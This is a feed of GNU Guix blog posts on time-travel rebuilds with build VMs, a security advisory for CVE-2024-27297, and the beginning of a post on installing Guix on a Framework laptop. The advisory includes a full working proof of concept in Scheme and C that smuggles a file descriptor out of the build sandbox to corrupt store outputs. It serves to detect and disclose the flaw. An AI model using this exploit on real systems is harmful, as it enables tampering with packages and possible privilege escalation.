
federatica_bot@federatica.space

GNU Guix: Adventures on the quest for long-term reproducible deployment


Rebuilding software five years later, how hard can it be? It can’t be that hard, especially when you pride yourself on having a tool that can travel in time and that does a good job at ensuring reproducible builds, right?

In hindsight, we can tell you: it’s more challenging than it seems. Users attempting to travel 5 years back with guix time-machine are (or were) unavoidably going to hit bumps on the road, a real problem because that’s one of the use cases Guix aims to support well, in particular in a reproducible research context.

In this post, we look at some of the challenges we face while traveling back, how we are overcoming them, and open issues.

The vision

First of all, one clarification: Guix aims to support time travel, but we’re talking of a time scale measured in years, not in decades. We know all too well that this is already very ambitious—it’s something that probably nobody except Nix and Guix are even trying. More importantly, software deployment at the scale of decades calls for very different, more radical techniques; it’s the work of archivists.

Concretely, Guix 1.0.0 was released in 2019 and our goal is to allow users to travel as far back as 1.0.0 and redeploy software from there, as in this example:

$ guix time-machine -q --commit=v1.0.0 -- \
     environment --ad-hoc python2 -- python
> guile: warning: failed to install locale
Python 2.7.15 (default, Jan  1 1970, 00:00:01) 
[GCC 5.5.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

(The command above uses guix environment, the predecessor of guix shell, which didn’t exist back then.) It’s only 5 years ago but it’s pretty much remote history on the scale of software evolution—in this case, that history comprises major changes in Guix itself and in Guile. How well does such a command work? Well, it depends.

The project has two build farms; bordeaux.guix.gnu.org has been keeping substitutes (pre-built binaries) of everything it built since roughly 2021, while ci.guix.gnu.org keeps substitutes for roughly two years, but there is currently no guarantee on the duration substitutes may be retained. Time traveling to a period where substitutes are available is fine: you end up downloading lots of binaries, but that’s OK, you rather quickly have your software environment at hand.

Bumps on the build road

Things get more complicated when targeting a period in time for which substitutes are no longer available, as was the case for v1.0.0 above. (And really, we should assume that substitutes won’t remain available forever: fellow NixOS hackers recently had to seriously consider trimming their 20-year-long history of substitutes because the costs are not sustainable.)

Apart from the long build times, the first problem that arises in the absence of substitutes is source code unavailability. I’ll spare you the details for this post—that problem alone would deserve a book. Suffice to say that we’re lucky that we started working on integrating Guix with Software Heritage years ago, and that there has been great progress over the last couple of years to get closer to full package source code archival (more precisely: 94% of the source code of packages available in Guix in January 2024 is archived, versus 72% of the packages available in May 2019).

So what happens when you run the time-machine command above? It brings you to May 2019, a time for which none of the official build farms had substitutes until a few days ago. Ideally, thanks to isolated build environments, you’d build things for hours or days, and in the end all those binaries will be here just as they were 5 years ago. In practice though, there are several problems that isolation as currently implemented does not address.

Screenshot of movie “Safety Last!” with Harold Lloyd hanging from a clock on a building’s façade.

Among those, the most frequent problem is time traps: software build processes that fail after a certain date (these are also referred to as “time bombs” but we’ve had enough of these and would rather call for a ceasefire). This plagues a handful of packages out of almost 30,000 but unfortunately we’re talking about packages deep in the dependency graph. Here are some examples:

  • OpenSSL unit tests fail after a certain date because some of the X.509 certificates they use have expired.
  • GnuTLS had similar issues; newer versions rely on datefudge to fake the date while running the tests and thus avoid that problem altogether.
  • Python 2.7, found in Guix 1.0.0, also had that problem with its TLS-related tests.
  • OpenJDK would fail to build at some point with this interesting message: Error: time is more than 10 years from present: 1388527200000 (the build system would consider that its data about currencies is likely outdated after 10 years).
  • Libgit2, a dependency of Guix, had (has?) time-dependent tests.
  • MariaDB tests started failing in 2019.

Someone traveling to v1.0.0 will hit several of these, preventing guix time-machine from completing. A serious bummer, especially to those who’ve come to Guix from the perspective of making their research workflow reproducible.
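
To make the mechanism concrete, here is a minimal sketch of a time trap, assuming GNU date. The helper name cert_still_valid and the expiry date are made up for illustration; they do not come from any of the packages listed above. The last command only decodes the millisecond timestamp quoted in the OpenJDK message.

```shell
# Hypothetical test helper: succeeds only while "now" is earlier than the
# certificate's expiry date, like a unit test relying on a fixed X.509 cert.
cert_still_valid() {
    # $1: expiry date (any format GNU date understands)
    # $2: "now", in seconds since the epoch
    not_after=$(date -u -d "$1" +%s) || return 2
    [ "$2" -lt "$not_after" ]
}

# The very same check passes or fails depending only on the clock.
# The expiry date below is invented for this example.
expiry='2020-06-01 00:00:00'
for now in '2019-05-02' '2024-03-01'; do
    if cert_still_valid "$expiry" "$(date -u -d "$now" +%s)"; then
        echo "$now: test passes"
    else
        echo "$now: test fails (certificate expired)"
    fi
done

# The timestamp in the OpenJDK message is in milliseconds since the epoch.
date -u -d "@$((1388527200000 / 1000))" +%Y-%m-%dT%H:%M:%SZ   # 2013-12-31T22:00:00Z
```

Nothing in the source code changes between the two runs; only the date does, which is why isolation of the file system and user IDs alone does not help.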

Time traps are the main road block, but there’s more! In rare cases, there’s software influenced by kernel details not controlled by the build daemon:

In a handful of cases, but important ones, builds might fail when performed on certain CPUs. We’re aware of at least two cases:

Neither time traps nor those obscure hardware-related issues can be avoided with the isolation mechanism currently used by the build daemon. This harms time traveling when substitutes are unavailable. Giving up is not in the ethos of this project though.

Where to go from here?

There are really two open questions here:

  1. How can we tell which packages need to be “fixed”, and how: building at a specific date, on a specific CPU?
  2. How can we keep those aspects of the build environment (time, CPU variant) under control?

Let’s start with #2. Before looking for a solution, it’s worth remembering where we come from. The build daemon runs build processes with a separate root file system, under dedicated user IDs, and in separate Linux namespaces, thereby minimizing interference with the rest of the system and ensuring a well-defined build environment. This technique was implemented by Eelco Dolstra for Nix in 2007 (with namespace support added in 2012), at a time when the word container had to do with boats and before “Docker” became the name of a software tool. In short, the approach consists in controlling the build environment in every detail (it’s at odds with the strategy that consists in achieving reproducible builds in spite of high build environment variability). That these are mere processes with a bunch of bind mounts makes this approach inexpensive and appealing.

Realizing we’d also want to control the build environment’s date, we naturally turn to Linux namespaces to address that—Dolstra, Löh, and Pierron already suggested something along these lines in the conclusion of their 2010 Journal of Functional Programming paper. Turns out there is now a time namespace. Unfortunately it’s limited to CLOCK_MONOTONIC and CLOCK_BOOTTIME clocks; the manual page states:

Note that time namespaces do not virtualize the CLOCK_REALTIME clock. Virtualization of this clock was avoided for reasons of complexity and overhead within the kernel.

I hear you say: What about datefudge and libfaketime? These rely on the LD_PRELOAD environment variable to trick the dynamic linker into pre-loading a library that provides symbols such as gettimeofday and clock_gettime. This is a fine approach in some cases, but it’s too fragile and too intrusive when targeting arbitrary build processes.
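
For reference, this is roughly what the LD_PRELOAD approach looks like from the command line. It is a sketch that assumes the faketime wrapper shipped with libfaketime is installed; run_at_date is a hypothetical helper name, not something Guix provides.

```shell
# Run a command with a faked wall clock, provided the faketime(1) wrapper
# from libfaketime is available.  run_at_date is a hypothetical helper.
run_at_date() {
    when=$1; shift
    if ! command -v faketime >/dev/null 2>&1; then
        echo "faketime not found; cannot fake the date" >&2
        return 127
    fi
    # faketime arranges for libfaketime to be pre-loaded so that its time
    # functions shadow those of the C library in the child process.
    faketime "$when" "$@"
}

# Ask a child process which year it thinks it is.
run_at_date '2020-06-15 12:00:00' date +%Y || echo "skipped"
```

The trick only works for programs that go through the dynamic linker; a statically linked program never loads the fake library, which is one reason the approach is fragile for arbitrary builds.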

That leaves us with essentially one viable option: virtual machines (VMs). The full-system QEMU lets you specify the initial real-time clock of the VM with the -rtc flag, which is exactly what we need (“user-land” QEMU such as qemu-x86_64 does not support it). And of course, it lets you specify the CPU model to emulate.
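
As a rough illustration, the sketch below assembles a QEMU command line that pins both the clock and the CPU model. The helper name build_vm_command and the parameter values are assumptions chosen for the example; a real invocation also needs a disk image and more, so the command is printed rather than executed.

```shell
# Print a full-system QEMU command line with a fixed initial real-time
# clock and an emulated CPU model.  build_vm_command is a hypothetical
# helper; the values passed below are illustrative only.
build_vm_command() {
    # $1: initial RTC date, $2: CPU model, $3: number of cores, $4: memory (MiB)
    printf 'qemu-system-x86_64 -rtc base=%s -cpu %s -smp %s -m %s\n' \
           "$1" "$2" "$3" "$4"
}

build_vm_command 2020-01-01T00:00:00 Skylake-Client 4 2048
```

The -rtc base= option sets the date the guest sees at boot, and -cpu selects the emulated processor, which covers the two aspects of the build environment that namespaces cannot control.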

News from the past

Now, the question is: where does the VM fit? The author considered writing a package transformation that would change a package such that it’s built in a well-defined VM. However, that wouldn’t really help: this option didn’t exist in past revisions, and it would lead to a different build anyway from the perspective of the daemon—a different derivation.

The best strategy appeared to be offloading: the build daemon can offload builds to different machines over SSH, we just need to let it send builds to a suitably-configured VM. To do that, we can reuse some of the machinery initially developed for childhurds that takes care of setting up offloading to the VM: creating substitute signing keys and SSH keys, exchanging secret key material between the host and the guest, and so on.

The end result is a service for Guix System users that can be configured in a few lines:

(use-modules (gnu services virtualization))

(operating-system
  ;; …
  (services (append (list (service virtual-build-machine-service-type))
                    %base-services)))

The default setting above provides a 4-core VM whose initial date is January 2020, emulating a Skylake CPU from that time—the right setup for someone willing to reproduce old binaries. You can check the configuration like this:

$ sudo herd configuration build-vm
CPU: Skylake-Client
number of CPU cores: 4
memory size: 2048 MiB
initial date: Wed Jan 01 00:00:00Z 2020

To enable offloading to that VM, one has to explicitly start it, like so:

$ sudo herd start build-vm

From there on, every native build is offloaded to the VM. The key part is that with almost no configuration, you get everything set up to build packages “in the past”. It’s a Guix System only solution; if you run Guix on another distro, you can set up a similar build VM but you’ll have to go through the cumbersome process that is all taken care of automatically here.

Of course it’s possible to choose different configuration parameters:

(service virtual-build-machine-service-type
         (virtual-build-machine
          (date (make-date 0 0 00 00 01 10 2017 0)) ;further back in time
          (cpu "Westmere")
          (cpu-count 16)
          (memory-size (* 8 1024))
          (auto-start? #t)))

With a build VM with its date set to January 2020, we have been able to rebuild Guix and its dependencies along with a bunch of packages such as emacs-minimal from v1.0.0, overcoming all the time traps and other challenges described earlier. As a side effect, substitutes are now available from ci.guix.gnu.org so you can even try this at home without having to rebuild the world:

$ guix time-machine -q --commit=v1.0.0 -- build emacs-minimal --dry-run
guile: warning: failed to install locale
substitute: updating substitutes from 'https://ci.guix.gnu.org'... 100.0%
38.5 MB would be downloaded:
   /gnu/store/53dnj0gmy5qxa4cbqpzq0fl2gcg55jpk-emacs-minimal-26.2

For the fun of it, we went as far as v0.16.0, released in December 2018:

$ guix time-machine -q --commit=v0.16.0 -- \
     environment --ad-hoc vim -- vim --version

This is the furthest we can go since channels and the underlying mechanisms that make time travel possible did not exist before that date.

There’s one “interesting” case we stumbled upon in that process: in OpenSSL 1.1.1g (released April 2020 and packaged in December 2020), some of the test certificates are not valid before April 2020, so the build VM needs to have its clock set to May 2020 or thereabouts. Booting the build VM with a different date can be done without reconfiguring the system:

$ sudo herd stop build-vm
$ sudo herd start build-vm -- -rtc base=2020-05-01T00:00:00

The -rtc … flags are passed straight to QEMU, which is handy when exploring workarounds…

The time-travel continuous integration jobset has been set up to check that we can, at any time, travel back to one of the past releases. This at least ensures that Guix itself and its dependencies have substitutes available at ci.guix.gnu.org.

Reproducible research workflows reproduced

Incidentally, this effort rebuilding 5-year-old packages has allowed us to fix embarrassing problems. Software that accompanies research papers that followed our reproducibility guidelines could no longer be deployed, at least not without this clock twiddling effort:

It’s good news that we can now re-deploy these 5-year-old software environments with minimum hassle; it’s bad news that holding this promise took extra effort.

The ability to reproduce the environment of software that accompanies research work should not be considered a mundanity or an exercise that’s “overkill”. The ability to rerun, inspect, and modify software is the natural extension of the scientific method. Without a companion reproducible software environment, research papers are merely the advertisement of scholarship, to paraphrase Jon Claerbout.

The future

The astute reader surely noticed that we didn’t answer question #1 above:

How can we tell which packages need to be “fixed”, and how: building at a specific date, on a specific CPU?

It’s a fact that Guix so far lacks information about the date, kernel, or CPU model that should be used to build a given package. Derivations purposefully lack that information on the grounds that it cannot be enforced in user land and is rarely necessary—which is true, but “rarely” is not the same as “never”, as we saw. Should we create a catalog of date, CPU, and/or kernel annotations for packages found in past revisions? Should we define, for the long-term, an all-encompassing derivation format? If we did and effectively required virtual build machines, what would that mean from a bootstrapping standpoint?

Here’s another option: build packages in VMs running in the year 2100, say, and on a baseline CPU. We don’t need to require all users to set up a virtual build machine—that would be impractical. It may be enough to set up the project build farms so they build everything that way. This would allow us to catch time traps and year 2038 bugs before they bite.
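
For readers unfamiliar with the year 2038 problem, the short sketch below (assuming GNU date and a shell with 64-bit arithmetic) shows where a signed 32-bit count of seconds since the epoch runs out, and where it lands after wrapping around.

```shell
# Largest value that fits in a signed 32-bit time_t.
max32=$(( (1 << 31) - 1 ))
echo "$max32"                                        # 2147483647
date -u -d "@$max32" +%Y-%m-%dT%H:%M:%SZ             # 2038-01-19T03:14:07Z

# One second later, a 32-bit counter wraps around to -2^31.
date -u -d "@-$(( 1 << 31 ))" +%Y-%m-%dT%H:%M:%SZ    # 1901-12-13T20:45:52Z
```

A build farm whose VMs run with a date past January 2038 would exercise exactly this boundary in every test suite it runs.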

Before we can do that, the virtual-build-machine service needs to be optimized. Right now, offloading to build VMs is as heavyweight as offloading to a separate physical build machine: data is transferred back and forth over SSH over TCP/IP. The first step will be to run SSH over a paravirtualized transport, such as AF_VSOCK sockets, instead. Another avenue would be to make /gnu/store in the guest VM an overlay over the host store so that inputs do not need to be transferred and copied.

Until then, happy software (re)deployment!

Acknowledgments

Thanks to Simon Tournier for insightful comments on a previous version of this post.

#gnu #gnuorg #opensource


GNU Guix: Fixed-Output Derivation Sandbox Bypass (CVE-2024-27297)

A security issue has been identified in guix-daemon which allows for fixed-output derivations, such as source code tarballs or Git checkouts, to be corrupted by an unprivileged user. This could also lead to local privilege escalation. This was originally reported to Nix but also affects Guix as we share some underlying code from an older version of Nix for the guix-daemon. Readers only interested in making sure their Guix is up to date and no longer affected by this vulnerability can skip down to the "Upgrading" section.

Vulnerability

The basic idea of the attack is to pass file descriptors through Unix sockets to allow another process to modify the derivation contents. This was first reported to Nix by jade and puckipedia with further details and a proof of concept here. Note that the proof of concept is written for Nix and has been adapted for GNU Guix below. This security advisory is registered as CVE-2024-27297 (details are also available at Nix's GitHub security advisory) and rated "moderate" in severity.

A fixed-output derivation is one where the output hash is known in advance, for instance one that produces a source tarball. The GNU Guix build sandbox purposefully excludes network access (for security and to ensure we can control and reproduce the build environment), but a fixed-output derivation does have network access, for instance to download that source tarball. However, as stated, the hash of the output must be known in advance, again for security (we know if the file contents would change) and reproducibility (it should always have the same output). The guix-daemon handles the build process and writing the output to the store, as a privileged process.
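
The hash check at the heart of a fixed-output derivation can be sketched in a few lines of shell. This is only an illustration: verify_fixed_output is a hypothetical name, the check is actually performed inside guix-daemon, and the sketch uses hexadecimal digests as printed by sha256sum rather than the encoding Guix displays.

```shell
# Succeed only if the file's SHA-256 matches the hash declared in advance.
# verify_fixed_output is a hypothetical helper, not a Guix command.
verify_fixed_output() {
    # $1: file to check, $2: expected SHA-256 as a hexadecimal string
    actual=$(sha256sum "$1" | cut -d ' ' -f 1)
    [ "$actual" = "$2" ]
}

# SHA-256 of the empty string, that is, the hash declared for an empty output.
empty_hash=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

out=$(mktemp)
verify_fixed_output "$out" "$empty_hash" && echo "accepted: content matches the declared hash"

# Any change to the content makes the check fail.
echo "unexpected content" >> "$out"
verify_fixed_output "$out" "$empty_hash" || echo "rejected: hash mismatch"
rm -f "$out"
```

The guarantee only holds if the content cannot change after the check, which is precisely what the vulnerability described next undermines.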

In the build sandbox for a fixed-output derivation, a file descriptor to its contents could be shared with another process via a Unix socket. This other process, outside of the build sandbox, can then modify the contents written to the store, changing them to something malicious or otherwise corrupting the output. While the output hash has already been determined, these changes would mean a fixed-output derivation could have contents written to the store which do not match the expected hash. This could then be used by the user or other packages as well.

Mitigation

This security issue (tracked here for GNU Guix) has been fixed by two commits by Ludovic Courtès. Users should make sure they have updated to this second commit to be protected from this vulnerability. Upgrade instructions are in the following section.

While several possible mitigation strategies were detailed in the original report, the simplest fix is to just copy the derivation output somewhere else, deleting the original, before writing to the store. Any file descriptors will no longer point to the contents which get written to the store, so only the guix-daemon should be able to write to the store, as designed. This is what the Nix project used in their own fix. This does add an additional copy/delete for each file, which may add a performance penalty for derivations with many files.
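
Why copying helps can be seen with nothing more than a shell and a temporary directory. The sketch below is an analogy and not the daemon's code: the function name is hypothetical, file descriptor 3 stands in for the descriptor smuggled out of the sandbox, and the final mv is a simplification of how the copy ends up in place.

```shell
# Show what a stale file descriptor can still reach, with and without the
# copy-then-delete step.  The body runs in a subshell, (...), so that file
# descriptor 3 does not leak into the calling shell.
write_through_stale_fd() (
    # $1: "copy" to apply the mitigation, anything else to skip it
    dir=$(mktemp -d) || exit 1
    printf 'original\n' > "$dir/out"

    # Open the output read-write without truncating it; this descriptor
    # plays the role of the one held by the attacker.
    exec 3<>"$dir/out"

    if [ "$1" = copy ]; then
        # Copy the output, delete the original, put the copy in its place.
        cp "$dir/out" "$dir/out.copy" && rm "$dir/out" \
            && mv "$dir/out.copy" "$dir/out"
    fi

    # Attempt to tamper with the output through the old descriptor.
    printf 'tampered\n' >&3
    exec 3>&-

    cat "$dir/out"
    rm -r "$dir"
)

write_through_stale_fd nocopy   # prints "tampered"
write_through_stale_fd copy     # prints "original"
```

After the copy, the descriptor still refers to the old, now unlinked file, so writes through it never reach the file that ends up under the output name.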

A proof of concept by Ludovic, adapted from the one in the original Nix report, is available at the end of this post. One can run this code with

guix build -f fixed-output-derivation-corruption.scm -M4

This will output whether the current guix-daemon being used is vulnerable or not. If it is vulnerable, the output will include a line similar to

We managed to corrupt /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd-65f05aca-17261, meaning that YOUR SYSTEM IS VULNERABLE!

The corrupted file can be removed with

guix gc -D /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd*

In general, corrupt files from the store can be found with

guix gc --verify=contents

which will also include any files corrupted through this vulnerability. Do note that this command can take a long time to complete as it checks every file under /gnu/store, which likely has many files.

Upgrading

Due to the severity of this security advisory, we strongly recommend all users to upgrade their guix-daemon immediately.

For a Guix System the procedure is just reconfiguring the system after a guix pull, either restarting guix-daemon or rebooting. For example,

guix pull
sudo guix system reconfigure /run/current-system/configuration.scm
sudo herd restart guix-daemon

where /run/current-system/configuration.scm is the current system configuration but could, of course, be replaced by a system configuration file of a user's choice.

For Guix running as a package manager on other distributions, one needs to guix pull with sudo, as the guix-daemon runs as root, and restart the guix-daemon service. For example, on a system using systemd to manage services,

sudo --login guix pull
sudo systemctl restart guix-daemon.service

Note that users who installed their distro's package of Guix (as opposed to using the install script) may need to take other steps, or upgrade the Guix package in the same way as other packages on their distro. Please consult the relevant documentation from your distro or contact the package maintainer for additional information or questions.

Conclusion

One of the key features and design principles of GNU Guix is to allow unprivileged package management through a secure and reproducible build environment. While every effort is made to protect the user and system from any malicious actors, it is always possible that there are flaws yet to be discovered, as has happened here. In this case, using the ingredients of how file descriptors and Unix sockets work even in the isolated build environment allowed for a security vulnerability with moderate impact.

Our thanks to jade and puckipedia for the original report, and Picnoir for bringing this to the attention of the GNU Guix security team. And a special thanks to Ludovic Courtès for a prompt fix and proof of concept.

Note that there are current efforts to rewrite the guix-daemon in Guile by Christopher Baines. For more information and the latest news on this front, please refer to the recent blog post and this message on the guix-devel mailing list.

Proof of Concept

Below is code to check if a guix-daemon is vulnerable to this exploit. Save this file as fixed-output-derivation-corruption.scm and run it following the instructions in "Mitigation" above. Some further details and example output can be found in issue #69728.

;; Checking for CVE-2024-27297.
;; Adapted from <https://hackmd.io/03UGerewRcy3db44JQoWvw>.

(use-modules (guix)
             (guix modules)
             (guix profiles)
             (gnu packages)
             (gnu packages gnupg)
             (gcrypt hash)
             ((rnrs bytevectors) #:select (string->utf8)))

(define (compiled-c-code name source)
  (define build-profile
    (profile (content (specifications->manifest '("gcc-toolchain")))))

  (define build
    (with-extensions (list guile-gcrypt)
     (with-imported-modules (source-module-closure '((guix build utils)
                                                     (guix profiles)))
       #~(begin
           (use-modules (guix build utils)
                        (guix profiles))
           (load-profile #+build-profile)
           (system* "gcc" "-Wall" "-g" "-O2" #+source "-o" #$output)))))

  (computed-file name build))

(define sender-source
  (plain-file "sender.c" "
      #include <sys/socket.h>
      #include <sys/un.h>
      #include <stdlib.h>
      #include <stddef.h>
      #include <stdio.h>
      #include <unistd.h>
      #include <fcntl.h>
      #include <errno.h>
      #include <string.h>

      int main(int argc, char **argv) {
          setvbuf(stdout, NULL, _IOLBF, 0);

          int sock = socket(AF_UNIX, SOCK_STREAM, 0);

          // Set up an abstract domain socket path to connect to.
          struct sockaddr_un data;
          data.sun_family = AF_UNIX;
          data.sun_path[0] = 0;
          strcpy(data.sun_path + 1, \"dihutenosa\");

          // Now try to connect. To ensure we work no matter what order we are
          // executed in, just busyloop here.
          int res = -1;
          while (res < 0) {
              printf(\"attempting connection...\\n\");
              res = connect(sock, (const struct sockaddr *)&data,
                  offsetof(struct sockaddr_un, sun_path)
                    + strlen(\"dihutenosa\")
                    + 1);
              if (res < 0 && errno != ECONNREFUSED) perror(\"connect\");
              if (errno != ECONNREFUSED) break;
              usleep(500000);
          }

          // Write our message header.
          struct msghdr msg = {0};
          msg.msg_control = malloc(128);
          msg.msg_controllen = 128;

          // Write an SCM_RIGHTS message containing the output path.
          struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
          hdr->cmsg_len = CMSG_LEN(sizeof(int));
          hdr->cmsg_level = SOL_SOCKET;
          hdr->cmsg_type = SCM_RIGHTS;
          int fd = open(getenv(\"out\"), O_RDWR | O_CREAT, 0640);
          memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));

          msg.msg_controllen = CMSG_SPACE(sizeof(int));

          // Write a single null byte too.
          msg.msg_iov = malloc(sizeof(struct iovec));
          msg.msg_iov[0].iov_base = \"\";
          msg.msg_iov[0].iov_len = 1;
          msg.msg_iovlen = 1;

          // Send it to the other side of this connection.
          res = sendmsg(sock, &msg, 0);
          if (res < 0) perror(\"sendmsg\");
          int buf;

          // Wait for the server to close the socket, implying that it has
          // received the command.
          recv(sock, (void *)&buf, sizeof(int), 0);
      }"))

(define receiver-source
  (mixed-text-file "receiver.c" "
      #include <sys/socket.h>
      #include <sys/un.h>
      #include <stdlib.h>
      #include <stddef.h>
      #include <stdio.h>
      #include <unistd.h>
      #include <sys/inotify.h>
      #include <string.h>

      int main(int argc, char **argv) {
          int sock = socket(AF_UNIX, SOCK_STREAM, 0);

          // Bind to the socket.
          struct sockaddr_un data;
          data.sun_family = AF_UNIX;
          data.sun_path[0] = 0;
          strcpy(data.sun_path + 1, \"dihutenosa\");
          int res = bind(sock, (const struct sockaddr *)&data,
              offsetof(struct sockaddr_un, sun_path)
              + strlen(\"dihutenosa\")
              + 1);
          if (res < 0) perror(\"bind\");

          res = listen(sock, 1);
          if (res < 0) perror(\"listen\");

          while (1) {
              setvbuf(stdout, NULL, _IOLBF, 0);
              printf(\"accepting connections...\\n\");
              int a = accept(sock, 0, 0);
              if (a < 0) perror(\"accept\");

              struct msghdr msg = {0};
              msg.msg_control = malloc(128);
              msg.msg_controllen = 128;

              // Receive the file descriptor as sent by the smuggler.
              recvmsg(a, &msg, 0);

              struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
              while (hdr) {
                  if (hdr->cmsg_level == SOL_SOCKET
                   && hdr->cmsg_type == SCM_RIGHTS) {
                      int res;

                      // Grab the copy of the file descriptor.
                      memcpy((void *)&res, CMSG_DATA(hdr), sizeof(int));
                      printf(\"preparing our hand...\\n\");

                      ftruncate(res, 0);
                      // Write the expected contents to the file, tricking Nix
                      // into accepting it as matching the fixed-output hash.
                      write(res, \"hello, world\\n\", strlen(\"hello, world\\n\"));

                      // But wait, the file is bigger than this! What could
                      // this code hide?

                      // First, we do a bit of a hack to get a path for the
                      // file descriptor we received. This is necessary because
                      // that file doesn't exist in our mount namespace!
                      char buf[128];
                      sprintf(buf, \"/proc/self/fd/%d\", res);

                      // Hook up an inotify on that file, so whenever Nix
                      // closes the file, we get notified.
                      int inot = inotify_init();
                      inotify_add_watch(inot, buf, IN_CLOSE_NOWRITE);

                      // Notify the smuggler that we've set everything up for
                      // the magic trick we're about to do.
                      close(a);

                      // So, before we continue with this code, a trip into Nix
                      // reveals a small flaw in fixed-output derivations. When
                      // storing their output, Nix has to hash them twice. Once
                      // to verify they match the \"flat\" hash of the derivation
                      // and once more after packing the file into the NAR that
                      // gets sent to a binary cache for others to consume. And
                      // there's a very slight window inbetween, where we could
                      // just swap the contents of our file. But the first hash
                      // is still noted down, and Nix will refuse to import our
                      // NAR file. To trick it, we need to write a reference to
                      // a store path that the source code for the smuggler drv
                      // references, to ensure it gets picked up. Continuing...

                      // Wait for the next inotify event to drop:
                      read(inot, buf, 128);

                      // first read + CA check has just been done, Nix is about
                      // to chown the file to root. afterwards, refscanning
                      // happens...

                      // Empty the file, seek to start.
                      ftruncate(res, 0);
                      lseek(res, 0, SEEK_SET);

                      // We swap out the contents!
                      static const char content[] = \"This file has been corrupted!\\n\";
                      write(res, content, strlen (content));
                      close(res);

                      printf(\"swaptrick finished, now to wait..\\n\");
                      return 0;
                  }

                  hdr = CMSG_NXTHDR(&msg, hdr);
              }
              close(a);
          }
      }"))

(define nonce
  (string-append "-" (number->string (car (gettimeofday)) 16)
                 "-" (number->string (getpid))))

(define original-text
  "This is the original text, before corruption.")

(define derivation-that-exfiltrates-fd
  (computed-file (string-append "derivation-that-exfiltrates-fd" nonce)
                 (with-imported-modules '((guix build utils))
                   #~(begin
                       (use-modules (guix build utils))
                       (invoke #+(compiled-c-code "sender" sender-source))
                       (call-with-output-file #$output
                         (lambda (port)
                           (display #$original-text port)))))
                 #:options `(#:hash-algo sha256
                             #:hash ,(sha256
                                      (string->utf8 original-text)))))

(define derivation-that-grabs-fd
  (computed-file (string-append "derivation-that-grabs-fd" nonce)
                 #~(begin
                     (open-output-file #$output) ;make sure there's an output
                     (execl #+(compiled-c-code "receiver" receiver-source)
                            "receiver"))
                 #:options `(#:hash-algo sha256
                             #:hash ,(sha256 #vu8()))))

(define check
  (computed-file "checking-for-vulnerability"
                 #~(begin
                     (use-modules (ice-9 textual-ports))

                     (mkdir #$output)            ;make sure there's an output
                     (format #t "This depends on ~a, which will grab the file
descriptor and corrupt ~a.~%~%"
                             #+derivation-that-grabs-fd
                             #+derivation-that-exfiltrates-fd)

                     (let ((content (call-with-input-file
                                        #+derivation-that-exfiltrates-fd
                                      get-string-all)))
                       (format #t "Here is what we see in ~a: ~s~%~%"
                               #+derivation-that-exfiltrates-fd content)
                       (if (string=? content #$original-text)
                           (format #t "Failed to corrupt ~a, \
your system is safe.~%"
                                   #+derivation-that-exfiltrates-fd)
                           (begin
                             (format #t "We managed to corrupt ~a, \
meaning that YOUR SYSTEM IS VULNERABLE!~%"
                                     #+derivation-that-exfiltrates-fd)
                             (exit 1)))))))

check

About GNU Guix

GNU Guix is a transactional package manager and an advanced distribution of the GNU system that respects user freedom. Guix can be used on top of any system running the Hurd or the Linux kernel, or it can be used as a standalone operating system distribution for i686, x86_64, ARMv7, AArch64, and POWER9 machines.

In addition to standard package management features, Guix supports transactional upgrades and roll-backs, unprivileged package management, per-user profiles, and garbage collection. When used as a standalone GNU/Linux distribution, Guix offers a declarative, stateless approach to operating system configuration management. Guix is highly customizable and hackable through Guile programming interfaces and extensions to the Scheme language.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

Andy Wingo: guix on the framework 13 amd

I got a new laptop! It’s a Framework 13 AMD: 8 cores, 2 threads per core, 64 GB RAM, 3:2 2256×1504 matte screen. It kicks my 5-year-old Dell XPS 13 in the pants, and I am so relieved to be back to a matte screen. I just got it up and running with Guix, which though easier than past installation experiences was not without some wrinkles, so here I wanted to share a recipe for what worked for me.

(I swear this isn’t going to become a product review blog, but when I went to post something like this on the Framework forum I got an error saying that new users could only post 2 links. I understand how we got here but hoo, that is a garbage experience!)

The basic deal

Upstream Guix works on the Framework 13 AMD, but only with software rendering and no wifi, and I wasn’t able to install from upstream media. This is mainly because Guix uses a modified kernel and doesn’t include necessary firmware. There is a third-party nonguix repository that defines packages for the vanilla Linux kernel and the linux-firmware collection; we have to use that repo if we want all functionality.

Of course having the firmware be user-hackable would be better, and it would be better if the Framework laptop used parts with free firmware. Something for a next revision, hopefully.

On firmware

As an aside, I think the official Free Software Foundation position on firmware is bad praxis. To recall, the idea is that if a device has embedded software (firmware) that can be updated, but that software is in a form that users can’t modify, then the system as a whole is not free software. This is technically correct but doesn’t logically imply that the right strategy for advancing free software is to forbid firmware blobs; you have a number of potential policy choices and you have to look at their expected results to evaluate which one is most in line with your goals.

Bright lines are useful, of course; I just think that with respect to free software, drawing that line around firmware is not interesting. To illustrate this point, I believe the current FSF position is that if you can run e.g. a USB ethernet adapter without installing non-free firmware, then it is kosher, otherwise it is haram. However many of these devices have firmware; it’s just that you aren’t updating it. So for example the USB Ethernet adapter I got with my Dell system many years ago has firmware, therefore it has bugs, but I have never updated that firmware because that’s not how we roll. Or, on my old laptop, I never updated the CPU microcode, despite Spectre and Meltdown and all the rest.

“Firmware, but never updated” reminds me of the wires around some New York neighborhoods that allow orthodox people to leave the house on Sabbath; useful if you are of a given community and enjoy the feeling of belonging, but I think even the faithful would see it as a hack. It is like how Richard Stallman wouldn’t use travel booking web sites because they had non-free JavaScript, but would happily call someone on the telephone to perform the booking for him, using those same sites. In that case, the net effect on the world of this particular bright line is negative: it does not advance free software in the least and only adds overhead. Privileging principle over praxis is generally a losing strategy.

Installation

Firstly I had to turn off secure boot in the BIOS settings; it’s in “security”.

I wasn’t expecting wifi to work out of the box, but for some reason the upstream Guix install media was not able to configure the network via either the Ethernet expansion card or an external USB-C Ethernet adapter that I had; it got stuck at the DHCP phase. So my initial installation attempt failed.

Then I realized that the nonguix repository has installation media, which is the same as upstream but with the vanilla kernel and linux-firmware. So on another machine where I had Guix installed, I added the nonguix channel and built the installation media, via guix system image -t iso9660 nongnu/system/install.scm. That gave me a file that I could write to a USB stick.
